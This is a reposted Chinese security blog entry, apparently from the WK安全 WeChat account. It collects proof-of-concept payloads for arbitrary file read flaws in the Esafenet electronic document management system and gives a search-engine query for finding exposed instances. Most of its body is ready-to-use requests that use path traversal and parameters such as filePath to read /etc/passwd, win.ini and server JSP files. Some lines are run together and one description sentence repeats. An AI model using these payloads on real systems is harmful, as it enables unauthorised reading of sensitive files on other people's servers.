免责声明由于传播、利用WK安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,WK安全及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
| 0x01 产品介绍
亿赛通电子文档管理系统是一款国内较早基于文件过滤驱动技术的文档加解密产品,它以亿赛通电子文档管理系统是一款国内较早基于文件过滤驱动技术的文档加解密产品,它以驱动层透明加密技术实现电子文档的全生命周期防护,保护范围广泛,涵盖终端电脑(包括Windows、Mac、Linux系统平台)、智能终端(如Android、IOS)以及各类应用系统,如OA、知识管理、文档管理、项目管理、PDM等。
| 0x02 影响产品
亿赛通电子文档管理系统| 0x03 语法特征
app:"亿赛通电子文档安全管理系统"
| 0x04 POC
打开页面
亿赛通-dlUltrasec-文件读取漏洞
url+/linuxUpdate/dlUltrasec?path=../../../../../../../../esafenet/CdgWeb/CDGServer3/index.jsp&type=1亿赛通-DecryptApplication-文件读取漏洞
windows:url+/CDGServer3/client/;login;/DecryptApplication?command=ViewUploadFile&filePath=C:/Windows/win.ini&uploadFileId=1&fileName1=ox9wcxwck7g1linux:url+/CDGServer3/client/;login;/DecryptApplication?command=ViewUploadFile&filePath=/etc/passwd&uploadFileId=1&fileName1=ox9wcxwck7g1
亿赛通-UploadFileList-文件读取漏洞
windwos:POST /CDGServer3/document/UploadFileList;login HTTP/1.1command=VeiwUploadFile&filePath=/etc/passwd&fileName1=111111
linux:POST /CDGServer3/document/UploadFileList;login HTTP/1.1command=VeiwUploadFile&filePath=/etc/passwd&fileName1=111111
亿赛通-dump-文件读取漏洞
POST/solr/flow/debug/dump?param=ContentStreamsHTTP/1.1stream.url=file:///c:/windows/win.ini
原文始发于微信公众号(WK安全):【漏洞复现】亿赛通电子文档管理系统文件泄露集合
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论